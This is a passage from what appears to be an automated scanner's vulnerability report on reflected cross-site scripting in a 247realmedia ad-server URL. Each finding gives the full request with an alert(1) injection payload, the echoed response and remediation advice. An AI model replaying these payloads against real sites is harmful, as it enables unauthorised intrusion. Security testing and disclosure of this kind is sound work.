GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/enc898f"%3b20d210cd7a0/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8615
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
h_VERSION = "8";
var TFSMFlash_WMODE = "transparent";
           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/enc898f";20d210cd7a0/homepage.html/L35/240741681/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c";
   var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + ""
...[SNIP]...

1.40. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27da1"-alert(1)-"ee3b4cee764 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html27da1"-alert(1)-"ee3b4cee764/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8659
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
= "8";
var TFSMFlash_WMODE = "transparent";
           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html27da1"-alert(1)-"ee3b4cee764/L35/1870965472/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c";
   var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";
var TFSMFl
...[SNIP]...

1.41. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bd19"><script>alert(1)</script>222d53b5be6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html3bd19"><script>alert(1)</script>222d53b5be6/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8719
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
<a href="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html3bd19"><script>alert(1)</script>222d53b5be6/L35/1334458038/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c" target="_blank">
...[SNIP]...

1.42. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 248ba'-alert(1)-'e64c6e55013 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html248ba'-alert(1)-'e64c6e55013/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8655
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
'var TFSMFlash_VERSION = "8";'+
   'var TFSMFlash_WMODE = "transparent";'+
           'var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html248ba'-alert(1)-'e64c6e55013/L35/679650372/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c";'+
       'var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG=" + TFSMFlash_OASCLICK + "";'+
   'var
...[SNIP]...

1.43. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c44"-alert(1)-"b3d33826415 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L3574c44"-alert(1)-"b3d33826415/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8663
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
= "8";
var TFSMFlash_WMODE = "transparent";
           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L3574c44"-alert(1)-"b3d33826415/L/838769806/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c";
   var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";
var TFSMFlash
...[SNIP]...

1.44. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c772'-alert(1)-'94c300a4c4b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L351c772'-alert(1)-'94c300a4c4b/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8663
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
TFSMFlash_VERSION = "8";'+
   'var TFSMFlash_WMODE = "transparent";'+
           'var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L351c772'-alert(1)-'94c300a4c4b/L/518792976/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c";'+
       'var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG=" + TFSMFlash_OASCLICK + "";'+
   'var T
...[SNIP]...

1.45. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bde8a"><script>alert(1)</script>feea2628afa was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35bde8a"><script>alert(1)</script>feea2628afa/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8727
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
<a href="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35bde8a"><script>alert(1)</script>feea2628afa/L/1082832737/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c" target="_blank">
...[SNIP]...

1.46. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ec0"><img%20src%3da%20onerror%3dalert(1)>b04a8fd2586 was submitted in the REST URL parameter 9. This input was echoed as d1ec0"><img src=a onerror=alert(1)>b04a8fd2586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1d1ec0"><img%20src%3da%20onerror%3dalert(1)>b04a8fd2586/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1d1ec0"><img src=a onerror=alert(1)>b04a8fd2586() {
document.getElementById("OAS_RMF_Right1d1ec0"><img src=a onerror=a
...[SNIP]...
<a href="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/352508165/Right1d1ec0"><img src=a onerror=alert(1)>b04a8fd2586/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c" target="_blank">
...[SNIP]...

1.47. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71615"-alert(1)-"486d947c1b2 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right171615"-alert(1)-"486d947c1b2/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 10227
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right171615"-alert(1)-"486d947c1b2() {
document.getElementById("OAS_RMF_Right171615"-alert(1)-"486d947c1b2_ORG").style.display = "block" ;
document.getElementById("OAS_RMF_Right171615"-alert(1)-"486d947c1b2_EXP").style.display = "block";
}
function expandhide_OAS_RMF_Right171615
...[SNIP]...

1.48. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 217be'-alert(1)-'9c7794b5111 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1217be'-alert(1)-'9c7794b5111/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 10227
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1217be'-alert(1)-'9c7794b5111() {
document.getElementById("OAS_RMF_Right1217be'-alert(1)-'9c7794b5111_ORG").style.disp
...[SNIP]...
<span id="OAS_RMF_Right1217be'-alert(1)-'9c7794b5111" style="width:160px; height:600px; position:relative;">
...[SNIP]...

1.49. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ebbfa(a)38307195cdd was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1ebbfa(a)38307195cdd/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 9687
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1ebbfa(a)38307195cdd() {
document.getElementById("OAS_RMF_Right1ebbfa(a)38307195cdd_ORG").style.display = "block" ;
document.getElementById("OAS_RMF_Right1ebbfa(a)38307195cdd_EXP").style.display = "bloc
...[SNIP]...

1.50. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49959"><script>alert(1)</script>7b53ec5be3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c?49959"><script>alert(1)</script>7b53ec5be3f=1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
